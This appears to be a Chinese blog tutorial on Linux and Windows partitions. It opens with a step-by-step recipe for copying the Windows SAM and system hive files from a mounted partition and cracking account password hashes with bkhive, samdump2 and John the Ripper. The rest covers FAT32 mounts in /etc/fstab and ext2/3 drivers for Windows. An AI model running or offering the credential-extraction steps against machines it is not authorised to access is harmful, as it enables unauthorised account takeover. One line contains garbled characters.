linux与Windows的系统分区

用linux启动，并挂载Windows的系统分区把c：windowssystem32config目录下的'SAM和system复制出来，也可以用WINPE，DOS引导盘，都可以的，只要把SAM和system复制出来就行

开始破解：

bkhive system keys ——生成keys文件

samdump2 SAM keys >hashes ——用SAM和keys生成hashes

john hashes ——跑hashes

现在没有在linux下，改天上图，下面我文字描述一下

mount -t ntfs /dev/hda1 /mnt/windows

mkdir /home/young001/sam

cp /mnt/windows/WINDOWSsystem32config/SAM /home/young001/sam

cp /mnt/windows/WINDOWSsystem32config/system /home/young001/sam

unount /mnt/windows

cd /home/young001/sam

bkhive system keys

samdump2 SAM keys >hashes

john hashes ——跑hashes

这样密码揪出来了

另外加上一些提示：

比如administrator密码是123456，那么他会在最底下这么显示

administrator：123456：500：e263f50a6a506be3d494d3d62b4dc666：：：看起来有点像/etc/passwd的内容格式，如果当时没有看清楚密码就清屏了，或者后来忘记已经破解了的密码，可以通过下面命令查看

john-1.7.2/run/john -show hashes有的时候密码处有可能会显示几个问号，如下

administrator：456：500：e263f50a6a506be3d494d3d62b4dc666：：：这个时候可以通过

john-1.7.2/run/john -show hashes看看密码是否完整。 如果还是不完整，那么可能密码没有完全破解完毕，可以加–restore 参数从原来基础上继续破解

john-1.7.2/run/john ——restore hashes

先说一点背景知识 。linux支持很多种文件系统，包括windows的fat32和ntfs。对fat32的支持已经很好，

可以直接使用，而对ntfs的支持还不是太好，只能读，而写是极危险的，并且对ntfs的支持不是默认的，也就

是说你想要使用ntfs的话，需要重新编译内核。鉴于重编内核对于新手的复杂性，这里只讲解使用fat32分区的

方法 下面给出上述问题的两种解决方案：1.在安装系统（linux），进行到分区选择挂载点时，你可以建立几个

挂载点，如/mnt/c，/mnt/d等，然后选择你的windows fat32分区，把它们分别挂载到前面建立的挂载点即可。

（注意，正如前面所说，在这里你不能把一个ntfs分区挂载到一个挂载点，应为ntfs不是默认支持的。）这样你

装好系统后就能直接使用你的windows fat32分区了。例如，你把windows的c盘（linux中的/dev/hda1）挂载

到/mnt/c，那么你就能在/mnt/c目录中找到你的c盘中的全部数据。2. 如果你在安装系统时没有像方案1所说

的那样挂载上你的fat32分区，没关系，仍然能够很方便的解决这个问题。首先，用一个文本编辑器（如vi）打

开/etc/fstab，在文件的最后加入类似如下的几行

/dev/hda1 /mnt/c vfat default 0 0

你所要做的修改就是，把/dev/hda1改成你要挂载的fat32分区在linux中的设备号，把/mnt/c改成相应的挂载

点即可。注意，挂载点就是一个目录，这个目录要事先建立。举一个例子，我有三个fat32分区，在windows中

是c,d,e盘，在linux中的设备号分别为/dev/hda1,/dev/hda5,/dev/hda6。那么我就要先建立3个挂载点，

如/mnt/c,/mnt/d,/mnt/e，然后在/etc/fstab中加上这么几行：

/dev/hda1 /mnt/c vfat default 0 0

/dev/hda5 /mnt/d vfat default 0 0

/dev/hda6 /mnt/e vfat default 0 0

保存一下退出编辑器。这样以后你重启??牴???? ?机器后就能直接使用c,d,e这三个fat32格式的windows分区了还有不会的请参考《linux就该这么学》，针对各种linux疑难杂症，帮助linux学习者。

Windows下挂载linux分区就只能借助第三方工具。

这里使用的是ext2fsd这个工具，还有其他几款软件参考

ext2/3 只读访问比较完善，驱动较多，reiserfs 较少，xfs 只有一个不能工作的雏形，ufs 有两个驱动，jfs 根本就没听说过有。

ext2 的驱动有 Ext2IFS ， FSDExt2 ， Ext2FSD ， ext2fsnt 等等。

ext2/3 可以用 ltools ， explorer2fs 导出 ext2/3 中的文件，不能无缝访问。

paragon-software.com 就是 partition manager 的公司，有个 Partition Explorer 可以导入，我记得以前好像有驱动的。

reiserfs 驱动只有 rfsd ，导入工具可以用 ltools + GUI 和 rfstool + GUI 。

Total Commander Plugins 支持 ext2/3 和 reiserfs ，据说就是两个开源驱动的组合，所以还是 GPL 的。

xfs 在 win 下有个 xfs32 ，只是雏形，连导入都不能工作。

usf 驱动有 ffsdrv 和 ufs2tools 。

1、进入命令行，进入解压缩之后的setup目录，运行setup xp。

2、进入wxp目录，运行Ext2Mgr.exe，在卷列表中，右键菜单中的Change Drive Letter 设置需要访问的linux分区的挂载点，也就是盘符。

3、进入资源管理器，就可以对这个分区进行访问了。不需要时只需删除第二步设置的盘符即可。

---